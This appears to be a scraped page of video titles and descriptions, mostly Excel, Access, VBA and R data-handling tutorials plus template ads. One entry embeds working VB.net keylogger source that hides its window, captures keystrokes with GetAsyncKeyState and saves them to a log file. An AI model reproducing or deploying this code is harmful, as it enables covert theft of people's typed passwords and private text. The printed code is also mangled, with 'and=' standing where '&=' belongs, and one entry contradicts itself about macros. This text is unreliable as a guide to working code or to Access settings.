Title: Access 2010: Move data from Excel to Access
Description:Lots of us create lists in Excel, because it's an easy, flexible place to create rows and columns of data. As lists grow, though, it's a good idea to switch to a database to help maintain the integrity of the data. Watch this video learn some techniques for moving your data into Access.
Title: Access 2010: Introduction to the Macro Builder
Description:One of the bigger changes in Access 2010 is the redesign of the Macro Builder. Watch this video to see how much easier it is to write and share Access macros.
Description:Expressions in Access are a lot like formulas in Excel. Watch this video to learn some of the new expression-building features in Access 2010.
Description:·El primer video de un conjunto que te explicaran paso a paso como programar en Vba (Visual Basic for Applications) si va muy rapido (pista: pa eso esta la pausa ajjaajjajaj) y no comenten sobre mi ortografia se q es mala Tan facil que un tonto lo entenderia
Title: R project (español) - Importar archivos (excel, csv, txt...)
Description:Como leer bases de datos usando r. Como editar datos en r. Como leer spreadsheet de Excel (2007 y anteriores). Comandos: read.table read.csv library(RODBC) odbCconnectExcel
Title: Microsoft Access 2007 Database Tutorial - Trust Center Locations
Description:www.myaccessvideos.com. Ths free Microsoft Access 2007 Database Tutorial solves the issue of the "Security Warning Certain content in the database has been disabled" This short training video will show you how to add a trusted location to ms access. After adding a trusted location the warning message will disappear and your macros and code will not work properly without hitting options everytime.
Description:expertoenexcel.wordpress.com Cómo ingresar datos en Excel, empieza a trabajar con Excel fácil. Con este videotutorial, aprenderás a ingresar correctamente datos en Excel, además de aprender a sumar ya dar un formato sencillo a tu tabla.
Description:Excel Invoice Template Software Invoice Generator provides a simple and effective business tool to create, manage and track invoices for your customers. The system allows for the storage of customer details, product descriptions and service costs along with exchange rate functionality that enables invoices to be created for international clients. With a few simple steps you can begin creating professional invoices including your company logo using Invoice Generator
Description:This tutorial will teach you how to make a very basic keylogger in VB.net. You will need to add the button, textbox and timers then use the code below: Option Strict On Public Class Form1 Public Declare Function GetAsyncKeyState Lib "user32" (ByVal vkey As Long) As Integer Private Sub timerKeys_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles timerKeys.Tick Dim result As Integer Dim key As String Dim i As Integer For i = 2 To 90 result = 0 result = GetAsyncKeyState(i) If result = -32767 Then key = Chr(i) If i = 13 Then key = vbNewLine Exit For End If Next i If key = Nothing Then Exit Sub End If If My.Computer.Keyboard.ShiftKeyDown OrElse My.Computer.Keyboard.CapsLock Then tbLog.Text and= key Else tbLog.Text and= key.ToLower End If If My.Computer.Keyboard.CtrlKeyDown AndAlso My.Computer.Keyboard.AltKeyDown AndAlso key = "Z" Then Me.Show() End If End Sub Private Sub btnHide_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnHide.Click Me.Hide() End Sub Private Sub timerSave_Tick() Handles timerSave.Tick My.Computer.FileSystem.WriteAllText("C:\HP\Log.txt", tbLog.Text, True) tbLog.Clear() End Sub Private Sub Form1_FormClosed(ByVal sender As Object, ByVal e As System.Windows.Forms.FormClosedEventArgs) Handles Me.FormClosed tbLog.Text and= vbNewLine and "Closed at: " and Now and vbNewLine timerSave_Tick() End Sub Private Sub Form1_Load(ByVal sender As Object, ByVal e As System.EventArgs) Handles Me.Load tbLog.Text = "Started at: " and Now ...
Title: Flexible Excel consolidation for multiple worksheets
Description:Excel has numerous ways to consolidate spreadsheets. This video demonstrates an approach to consolidating worksheets that is very flexible. The only requirement is that each worksheet needs to be structured the same. You can use this consolidation method to summarize financial statements for multiple operations or to consolidate project budgets. You can down load a copy of this example at the following address: www.rpscgi.com If you need help with your financial planning, budgeting or reporting, contact us at info@rpscgi.com or check our our web site at www.rpscgi.com. This spreadsheet is available for download at; www.rpscgi.com
Title: cómo integrar Excel y Access manejando bases de datos sin Access jfksoft.com
Description:Obtenga una membresia Premiun de todas las plantilla en goo.gl Un demo de como se puede hacer para interactuar una base de datos Access desde una plantilla de Excel. Aquí explicamos paso a paso su funcionamiento y sobre todo prueba la potencia de hacer consultas de access desde excel. Uselo para dar mayor capacidad y sin usar formulas de excel. mas información en www.jfksoft.com
Description:Crear un cuestionario donde las respuestas sean introducidas mediante distintos tipos de campos de control de formularios. El documento es guardado como plantilla y protegido para que unicamente puedan rellenarse los campos del formulario.
Description:Find this game and others at: www.uncw.edu This is a tutorial video that shows how to use the Microsoft Excel bingo card generators found on uncw.edu/edgames . Bingo is one of the best board games for use in the classroom. Yet, it takes so long to create 20 or 30 unique bingo cards. This Microsoft Excel Bingo Card Generator saves all that time allowing you to type in one card, and then it will create the rest. The tutorial shows the 3x3, 4x4, and 5x5 bingo card generators. All of these game templates can be found at: uncw.edu/edgames
Title: factura excel plantilla con base de datos incluida mas rapido mas versatil mas potente jfksoft.com
Description:www.jfksoft.com Esta es la nueva version de factura excel que trabaja con base de datos access sion requerir tener instalado access en mi computador. Su funcionamiento sigue basandose en una plantilla creada en excel. veala en accion mas potente... muy pronto publicaremos una una demostracion con 50000 productos y 50000 clientes para ver la potencia y versatilidad. www.jfksoft.com